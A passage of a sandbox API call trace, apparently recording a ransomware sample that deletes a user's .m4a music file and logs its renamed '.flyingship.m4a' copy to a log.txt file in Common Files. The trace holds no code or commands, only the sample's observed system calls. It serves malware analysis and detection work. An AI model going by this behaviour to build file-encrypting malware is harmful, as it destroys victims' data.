dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.143] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0181.143] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\4b9s3wh6aiujay85.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0181.144] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.144] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.144] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0181.144] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.144] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.146] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.156] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0181.156] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.156] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.156] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.156] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.156] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.157] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFilePart=0x0) returned 0x4a [0181.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x1140fac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0x90af58 [0181.158] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\4b9s3wh6aiujay85.m4a")) returned 1 [0181.160] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x1140fac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0 [0181.161] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.171] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.172] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0181.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0181.173] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.173] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.173] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.173] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.173] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.174] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.174] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.175] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.175] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0181.175] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.175] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.177] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0181.177] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1d8a, lpOverlapped=0x0) returned 1 [0181.177] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0181.177] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1d8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.177] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0181.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\n", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0181.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0x8c4a48 [0181.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\n", cchWideChar=88, lpMultiByteStr=0x8c4a48, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 88 [0181.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0181.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0181.177] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x57, lpOverlapped=0x0) returned 1 [0181.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0181.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.178] CloseHandle (hObject=0x120) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0181.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0181.200] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0181.200] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: 